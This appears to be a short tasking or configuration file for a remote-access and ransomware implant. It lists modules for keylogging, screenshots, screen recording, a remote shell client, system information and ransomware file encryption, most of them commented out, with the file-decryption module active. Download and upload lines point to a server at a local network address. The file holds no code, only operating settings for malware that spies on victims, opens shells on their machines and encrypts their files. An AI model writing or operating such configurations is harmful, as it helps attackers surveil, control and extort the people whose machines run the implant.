# m kg 15
# m screenshot 10
# m screenrecord 15
# m remoteshellclient 0
# m systeminfo 0
# m ransomware_encrypt_files 0
m ransomware_decrypt_files 0
d http://192.168.1.110:8000/

u http://192.168.1.110:8000/
